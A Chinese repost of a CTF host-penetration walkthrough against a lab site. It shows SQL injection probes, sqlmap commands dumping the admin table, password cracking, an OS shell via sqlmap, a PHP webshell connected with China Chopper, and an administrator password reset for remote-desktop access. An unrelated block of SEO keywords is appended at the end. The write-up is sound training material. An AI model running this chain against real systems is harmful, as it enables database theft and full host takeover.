千家信息网

CTF主机渗透的方法是什么

发表于:2024-11-25 作者:千家信息网编辑
千家信息网最后更新 2024年11月25日,这篇文章主要介绍了CTF主机渗透的方法是什么的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇CTF主机渗透的方法是什么文章都会有所收获,下面我们一起来看看吧。第一步:首先打
千家信息网最后更新 2024年11月25日CTF主机渗透的方法是什么

这篇文章主要介绍了CTF主机渗透的方法是什么的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇CTF主机渗透的方法是什么文章都会有所收获,下面我们一起来看看吧。

第一步:首先打开连接地址: http://202.0.0.207

第二步:寻找漏洞点,点击页面的时候,我们看到是PHP的网站,以及url中的参数名为cid,那我们可以使用sql注入试试,看是否存在sql注入漏洞

我们使用手工判断方法:

http://202.0.0.207/product.php?cid=3', 页面异常

http://202.0.0.207/product.php?cid=3 and 1=1,正常

http://202.0.0.207/product.php?cid=3 and 1=2,异常

从而判断此处一定存在sql注入漏洞,且参数类型为整型。

这里我们可以使用盲注来手工注入。因为sqlmap也支持盲注类型,所有为了节约时间我们就使用sqlmap来脱库吧!

第二步:使用sqlmap来脱库

sqlmap -u http://202.0.0.207/product.php?cid=3

此参数爆出时间盲注和联合注入攻击可以实现。

接下来我们直接开始跑库吧

sqlmap -u http://202.0.0.207/product.php?cid=3 -dbs

我们选择510cms数据库来爆吧

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -tables

再来爆510_admin试试

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin --columns

接下来爆数据

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin -C id,mid,name,passwd,remark -dump

然后我们想要admin用户的密码:8dbdf8221fcf4bd6ac5a48317baa948c,在线MD5解密后得到密码为adminlwphp

第三步:我们接下来就去找后台登录页面了

这里我使用御剑后台扫描器

首先我们还是看登录页面的源码,看是不是有flag,果然如此,在这里拿到一个flag3{d3eac3a68b7d3863cc7bd45ba948195d}

接下来我们使用爆库出来的管理员账户和密码登录:admin/ adminlwphp,登录成功

第四步:胡乱捣腾

进入后台后,现在也只有到处去收集有用信息,看下有没有直接拿flag的地方了。一不小心,突然看到了网站绝对路径C:/www/,那根据前面爆出的sql注入漏洞,我们能不能拿到cmdshell呢?我们接下来尝试一下

sqlmap -u http://202.0.0.207/product.php?cid=3 --os-shell

果然拿到了cmdshell,真XX是一个惊喜,那么我们接下就看下现在拥有的系统权限是什么

第五步:一句话木马上传及利用

接下来就直接写入一句话木马了

echo ^>C:/WWW/shell.php

接下来我们上菜刀工具

连接成功

第六步:胡乱捣腾

下面看到这么多页面心头就开始发慌,又得漫山遍野的去收集flag了,

在网站根目录发现flag.php文件,发现flag1=flag1{6ab7c0c46b171d04f1cab922c2f9f017}

花了10多分钟,再也没有找到flag,那只有想其他的办法了。在configs中找到config.php,这个是数据库的配置文件,我们得到了数据库连接的账户root密码为windpasssql

我们使用菜刀对数据库进行连接

提交后,连接成功

继续看这里有没有flag,又拿到一个flag=flag2{981c05134c56092b83b3e9c9b4116ac1}

我们使用菜刀工具进入虚拟终端,看下目前的权限是什么,需要提权不?结果发现是system权限,

执行命令netstat -an查看3389端口已经开启

et user administrator godun.f

修改管理员密码为godun.f,

然后远程桌面登录远程主机

拿到flag=flag4{e97950cb2dea110c53cb599abc826268}

拿到了4个flag,还有一个不知道藏在哪里,我们还得继续找,找了半天,最后在,C盘的根目录下找到了flag5{c3bc1e7b8325d75816e1ca8ae5ae72ad}

最后,到此为止,5个flag全部找出来了,接下来我们把5个flag放入答题框

关于"CTF主机渗透的方法是什么"这篇文章的内容就介绍到这里,感谢各位的阅读!相信大家对"CTF主机渗透的方法是什么"知识都有一定的了解,大家如果还想学习更多知识,欢迎关注行业资讯频道。

接下来 主机 方法 密码 数据 页面 登录 数据库 漏洞 成功 参数 后台 权限 知识 网站 一句话 内容 只有 工具 手工 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 兴安租房网络安全 泰州专业软件开发价格大全 如何理解网络安全三同步 戴尔服务器查看硬盘raid 网络安全专业考武汉市公务员岗位 华为5g网络技术高校 开服务器有高级插件吗 江西省网络安全责任制 华讯公司软件开发薪资 黑龙江软件开发外包多少钱 宿迁华鸿联创软件开发戴鹏 怎样保障语言网络安全 南京东开网络技术有限责任公司 小学班会记录网络安全教育 潮汕app软件开发哪里好 网络安全为主题办一张手抄报 联益时代广州互联网科技有限公司 西安小程序开发完才用服务器吗 list放数据库查询结果 服务器不能开按键精灵 浙江农业银行软件开发中心 阳江专业软件开发维修电话 正常启动数据库的命令是 联想服务器支持最大硬盘 国家网络安全网 获取服务器类型 规划公司的网络技术发展路线 广电可以引进国外网络技术吗 安徽网络安全审计硬件设备价格 秦皇岛网络技术联系方式
0